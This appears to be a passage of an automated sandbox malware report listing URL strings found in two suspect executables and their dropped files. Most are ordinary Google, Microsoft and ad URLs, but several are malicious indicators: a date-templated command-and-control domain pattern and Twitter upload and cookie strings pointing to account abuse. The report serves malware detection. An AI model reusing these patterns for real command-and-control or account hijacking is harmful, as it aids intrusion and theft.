Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx4
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxng
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxtlv
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://content.googleapis.com
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 6272167835D47591.exe, 00000002.00000002.353010517.00000000034BF000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: 6272167835D47591.exe, 00000004.00000003.272881869.0000000004199000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272769692.00000000041B7000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272881869.0000000004199000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272769692.00000000041B7000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: 6272167835D47591.exe	String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 6272167835D47591.exe	String found in binary or memory: https://drive.google.com/drive/settings
Source: 6272167835D47591.exe, 00000004.00000003.272929713.0000000004193000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsdlhO
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsdlhO3
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Localwebdata1611970737633.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabH
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://feedback.googleusercontent.com
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com;
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://hangouts.google.com/
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 6272167835D47591.exe	String found in binary or memory: https://mail.google.com/mail
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail/#settings
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail8
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/
Source: 6272167835D47591.exe	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsOU23
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://pki.goog/repository/0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: 6272167835D47591.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 6272167835D47591.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsJtW20
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: N1yprTBBXs.exe	String found in binary or memory: https://tools.google.com/service/update
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: N1yprTBBXs.exe, 00000000.00000002.268429575.0000000002C85000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000002.00000003.287668875.0000000004150000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp, ecv37E8.tmp.9.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=299872286.1601476511
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272881869.0000000004199000.00000004.00000001.sdmp, ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/:y
Source: N1yprTBBXs.exe	String found in binary or memory: https://www.google.com/accounts/ForgotPasswd?service=goopy&hl=zh-CN
Source: N1yprTBBXs.exe	String found in binary or memory: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CN
Source: N1yprTBBXs.exe	String found in binary or memory: https://www.google.com/accounts/NewAccount?service=goopy&hl=zh-CNgoopyhttps://www.google.com/account
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272769692.00000000041B7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint
Source: 6272167835D47591.exe	String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272769692.00000000041B7000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN7
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprintLb
Source: 6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com;
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/h
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonlyS?
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts=
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings:s
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwritecon2
Source: 6272167835D47591.exe	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierraappli?
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.emails?
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
